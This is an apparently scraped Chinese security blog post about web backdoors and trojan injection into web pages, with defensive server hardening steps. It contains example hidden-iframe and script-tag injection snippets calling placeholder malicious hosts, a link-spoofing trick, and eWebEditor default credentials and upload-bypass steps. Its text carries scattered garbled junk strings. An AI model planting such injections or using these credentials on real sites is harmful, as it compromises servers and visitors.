`

解析网页后门和挂马

阅读更多

网站被挂马,被植入后门,这是管理员们无论如何都无法忍受的。Web服务器被攻克不算,还“城门失火殃及池鱼”,网站的浏览者也不能幸免。这无论是对企业的信誉,还是对管理员的技术能力都是沉重的打击。下面笔者结合实例对网页后门及其网页挂马的技术进行解析,知己知彼,拒绝攻击。

一、前置知识
W&q1Y"o-cJ6SR-m)u,s+tm0网页后门其实就是一段网页代码,主要以ASP和PHP代码为主。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行某些危险的操作,获得某些敏感的技术信息或者通过渗透,提权获得服务器的控制权。并且这也是攻击者控制服务器的一条通道,比一般的入侵更具有隐蔽性。

    网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码。浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机。

二、网页挂马的类型
'zO"~ xI01、框架嵌入式网络挂马IXPUB技术博客 ms7LX8bNq
网页木马被攻击者利用iframe语句,加载到任意网页中都可执行的挂马形式,是最早也是最有效的的一种网络挂马技术。通常的挂马代码如下:

<iframe. src=http://www.xxx.com/muma.html width=0 height=0></iframe>

解释:在打开插入该句代码的网页后,就也就打开了http://www.xxx.com/muma.html页面,但是由于它的长和宽都为“0”,所以很难察觉,非常具有隐蔽性。下面我们做过做个演示,比如在某网页中插入如下代码:

<iframe. src=http://safe.it168.com width=200 height=200></iframe>IXPUB技术博客.i7i&D["Y)L |
在“百度”中嵌入了“IT168安全版块”的页面。


&Lg2];}7kN%I;n02、js调用型网页挂马
:r M/L;uh2of9d0js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术,如:黑客先制作一个.js文件,然后利用js代码调用到挂马的网页。通常代码如下:

<script. language=javascript. src=http://www.xxx.com/gm.js></script>IXPUB技术博客O#s(]&a d:_;r
http://www.xxx.com/gm.js就是一个js脚本文件,通过它调用和执行木马的服务端。这些js文件一般都可以通过工具生成,攻击者只需输入相关的选项就可以了.

3、图片伪装挂马
"U,n!A,J6cI/o0随着防毒技术的发展,黑手段也不停地更新,图片木马技术逃避杀毒监视的新技术,攻击者将类似:http://www.xxx.com/test.htm中的木马代码植入到test.gif图片文件中,这些嵌入代码的图片都可以用工具生成,攻击者只需输入相关的选项就可以了,。图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:

<html>
I/nx5o;bsR0<iframe. src="http://www.xxx.com/test.htm" height=0 width=0> </iframe>
)I8z~"a9b"[/O8HD0<img src="http://www.xxx.com/test.jpg"></center>
lp_V {x0r0</html>IXPUB技术博客2P'c:?/rp\
注:当用户打开http://www.xxx.com/test.htm是,显示给用户的是http://www.xxx.com/test.jpg,而http://www.xxx.com/test.htm网页代码也随之运行。

4、网络钓鱼挂马(也称为伪装调用挂马)
X6cg` Gr0网络中最常见的欺骗手段,黑客们利用人们的猎奇、贪心等心理伪装构造一个链接或者一个网页,利用社会工程学欺骗方法,引诱点击,当用户打开一个看似正常的页面时,网页代码随之运行,隐蔽性极高。这种方式往往和欺骗用户输入某些个人隐私信息,然后窃取个人隐私相关联。比如攻击者模仿腾讯公司设计了一个获取QQ币的页面,引诱输入QQ好和密码。等用户输入完提交后,就把这些信息发送到攻击者指定的地方。

5、伪装挂马
/^?2FI6f0高级欺骗,黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级欺骗技术,当用户访问木马页面时地址栏显示www.sina.com或者security.ctocio.com.cn等用户信任地址,其实却打开了被挂马的页面,从而实现欺骗,示例代码如:

<p><a id="qipian" href="http://www.hacker.com.cn"></a></p>IXPUB技术博客e N/_'tG ^?:G
<div>
1m/C`)Zso3u0<a href="http://safe.it168.com" target="_blank">IXPUB技术博客,G N8PL9m1?*k8u
<table>IXPUB技术博客 R'i]"i\*R/L
<caption>
^%_e c!e^vV0<label for="qipian">IXPUB技术博客K#Jww(| R
<u style="cursor;pointer;color;blue">
~5muiX Q*[0safe.it168.com IT168安全版块IXPUB技术博客I,twe_\
</u>IXPUB技术博客Py~+C3ej9S2yQ)v
</label>IXPUB技术博客HA_'M H'W!A'A
</caption>
d#Gio1{4B.{0</table>IXPUB技术博客6b8Swx(M/RV
</a>
?]G8fg3X"r0</div>IXPUB技术博客DN5jo nN8B
上面的代码的效果,在貌似http://safe.it168.com的链接点击却打开了http://www.hacker.com.cn

总结:上述的挂马方式都是利用了系统的漏洞,并且挂马的代码不用攻击者编写,都是实现了工具化、傻瓜化。技术门槛比较低,因此危害也特别大。

三、网页漏洞的寻找方法
\)u'EAq"w l0网页的漏洞主要有注入漏洞、跨站漏洞、旁注漏洞、上传漏洞、暴库漏洞和程序漏洞等等。针对这么多的漏洞威胁,网站管理员要对自己的网站进行安全检测,然后进行安全设置或者代码改写。那如何来检测网站存在的漏洞呢?其实,很多攻击者都是通过一些黑客工具来检测网站的漏洞然后实施攻击的。那么网站的管理员就可以利用这些工具对网站进行安全检测,看有没有上述漏洞,笔者就不一一演示了。下面就列举一个当前比较流行的eWEBEditor在线HTML编辑器上传漏洞做个演示和分析。

1、网站入侵分析IXPUB技术博客YA JHSGk6]&Xf
eWEBEditor是一个在线的HTML编辑器,很多网站都集成这个编辑器,以方便发布信息。低版本的eWEBEditor在线HTML编辑器,存在者上传漏洞,黑客利用这点得到WEBSHELL(网页管理权限)后,修改了网站,进行了挂马操作。

    其原理是:eWEBEditor的默认管理员登录页面没有更改,而且默认的用户名和密码都没有更改。攻击者登陆eWEBEditor后,添加一种新的样式类型,然后设置上传文件的类型,比如加入asp文件类型,就可以上传一个网页木马了。

2、判断分析网页漏洞IXPUB技术博客6z.@dFaY-BF-{
(1)攻击者判断网站是否采用了eWEBEditor的方法一般都是通过浏览网站查看相关的页面或者通过搜索引擎搜索类似"ewebeditor.asp?id="语句,只要类似的语句存在,就能判断网站确实使用了WEB编辑器。

(2)eWEBEditor编辑器可能被黑客利用的安全漏洞:
nm;\ \6t0a.管理员未对数据库的路径和名称进行修改,导致黑客可以利用编辑器默认路径直接对网站数据库进行下载。

b.管理员未对编辑器的后台管理路径进行修改导致黑客可以通过数据库获得的用户名和密码进行登陆或者直接输入默认的用户名和密码,直接进入编辑器的后台。

c.该WEB编辑器上传程序存在安全漏洞。


R.I M\1W,Z]Q0四、网页木马的防御和清除
;rz9F vu01、防御网页木马,服务器设置非常重要,反注册、卸载危险组件:(网页后门木马调用的组件)

(1)卸载wscript.shell对象,在cmd先或者直接运行:IXPUB技术博客4m8gc(_d
regsvr32 /u %windir%\system32\WSHom.Ocx

(2)卸载FSO对象,在cmd下或者直接运行:
{-m5N y3_Zu(`.G0regsvr32.exe /u %windir%\system32\scrrun.dll

(3)卸载stream对象,在cmd下或者直接运行:
!_#k%F t8i0regsvr32.exe /u /s "C:\Program Files\Common Files\System\ado\msado15.dll"

注:如果想恢复的话只需重新注册即可,例如:regsvr32 %windir%\system32\WSHom.Ocx

2、清理网页挂马
K#G s Ib8\0(1)利用雷客图ASP站长安全助手查找所有在2008-3.1日-2008.3.5日之间所有修改过的文件里是否有iframe语句和http://www.xxx.com/a.htm关键词,进行手工清理。

(2)也可利用雷客图ASP站长安全助手批量删除网马。

(3)检测JS文件,在2008-3.1日-2008.3.5日之间增加的JS文件全部删除。

    从分析报告可以看到网站的admin路径下发现lb.asp网页木马,经分析为老兵的网页木马。(加密后依旧能通过特征码分辨,推荐网站管理员使用雷客ASP站长安全助手,经常检测网站是否被非法修改。)

提示:雷客图ASP站长安全助手可以帮助站长分析网站的安全状况,但是一定要更改它的默认用户名和密码。

3、解决eWEBEditor编辑器安全隐患
6?u DB;}Qb0由于网站在开发时集成了eWEBEditor编辑器,删除或者替换容易导致其他问题的出现,推荐按如下方案解决

(1)修改该编辑器的默认数据库路径和数据库名,防止被黑客非法下载。IXPUB技术博客e6ux0vAI
默认登录路径admin_login.aspIXPUB技术博客}N7Z N7I3c
默认数据库db/ewebeditor.mdb

(2)修改编辑器后台登录路径和默认的登录用户名和密码,防止黑客进入管理界面。
vU"qj.h/y;x @0默认帐号admin
,{hf3GL f-R0默认密码admin或者admin888

(3)对Upload.asp语句进行修改,防止黑客利用其上传ASP木马从而获得WEB权限。IXPUB技术博客8cO:c,r*| WS[
对上传语句现在进行修改:
@\9|3^9c4LI0将原来的:sAllowExt=Replace(UCase(sAllowExt),"ASP","")
vDUY/|-o(oh0修改为:
Y-b'| M0s0sAllowExt=Replace(UCase(sAllowExt),"ASP",""),"CER",""),"ASA",""),"CDX",""),"HTR","")
x] HzdTK+\"`X;U0增加上传对cer、asa、cdx、htr文件类型的限制,因为这些类型的文件都是可以执行的文件,可以被攻击者利用进行对网站及其服务器进行危险操作的文件类型。

总结:网页后门和网页挂马是网站最大的敌人,他们对网站的危害几乎是毁灭性的。网站管理员们只有了解了其原理、掌握防治技术才能保护网站的安全。

分享到:
评论

相关推荐

    论文研究-网页后门木马扫描系统的设计和实现 .pdf

    网页后门木马扫描系统的设计和实现,易方昶,王艳清,由于计算机系统和信息网络系统本身固有的不健全性,网站被挂马,被植入后门,给网站管理员和浏览者带来了不必要的麻烦。基于这些

    网页后门 ad.asp

    网页后门 ad.asp webshell是什么? 一方面,webshell可以被站长常常用于网站管理、服务器管理等等。  根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行程序命令(视webshell权限而定)...

    后门技术和Linux LKM Rootkit详细解析

    在本篇文章里, 我们将看到各种不同的后门技术,特别是Linux的可装载内核模块(LKM)。 我们将会发现LKM后门比传统的后门程序...介绍一下已经存在的后门技术, 然后和LKM技术相比较, 最后讨论我么的LKM程序的设计与实现。

    素材网解析整站源码去后门板

    素材网站解析源码需要对接相应的网站会员 实现共享下载

    25000Linux集群+去后门补丁+vc补丁

    测试了确实是正版25000的主控和Linux小马当然也带后门 生成器上面带的后门域名无法直接去掉 通过运行内存补丁生成小马可以直接0填充掉后门地址 SS无法查到连接,域名解析到127.0.0.1的 只有等到解析到IP地址的时候...

    超强SETHC后门超强SETHC后门超强SETHC后门

    超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强SETHC后门超强...

    Php后门php 后门

    php 后门

    windows后门程序windows后门程序

    windows后门程序windows后门程序wiwindows后门程序ndows后门程序

    php批量清马挂马工具

    php批量挂马,php扫马工具,php后门工具

    解析全网平台源码去后门版.rar

    这是一个素材解析pgp源码,里面包含了前台和后台,后台的解析就是需要配置网站的会员,如果侵权请联系,我删除。

    反向连接后门代码

    用C实现的反向连接后门代码。具有反向连接功能,服务器端通过域名解析向客户端发起建立连接请求。

    常见后门伪装技巧常见后门伪装技巧常见后门伪装技巧

    常见后门伪装技巧常见后门伪装技巧常见后门伪装技巧

    查杀ASP网页木马,找到后门页面

    查杀ASP网页木马,找到后门页面,这个我是一年前找到的东西,不好意思刚发上来,最近很多ASP网站被挂马,用这个查杀,马上能找到被上传后门的那个页面。 这个代码也是我在网上找的,没有做任何改动,默认登录admin ...

    shift后门带下载功能

    shift后门shift后门shift后门shift后门shift后门shift后门shift后门shift后门shift后门shift后门

    Safe3网页防篡改系统企业版v4.2

    网页防挂马 2.防止上传webshell web后门 3.网页防篡改 技术特点 1.内核安全规则触发机制,与系统底层无缝衔接,直接拦截网页篡改,无需利用备份文件还原,真正高效的保护 网页,杜绝利用备份文件还原时间差,...

    3个php后门WebShell木马扫描神器

    3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。

    教你建立telnet后门和隐藏用户

    本word教你建立telnet后门和建立超级隐藏用户。

    匿名管道及双管道后门,后门技术

    匿名管道及双管道后门,后门技术匿名管道及双管道后门,后门技术

    作真正属于自己的后门程序

    1 如何使非常规后门变成exe后门,方便我们使用,这里我们用来演示的后门程序是黑客之门1.0版本。 2 如何修改后门程序躲过杀毒软件(这里拿比较强悍的avp-来自俄罗斯的卡巴斯基 作为例子),这里使用的是修改特征码的...

Global site tag (gtag.js) - Google Analytics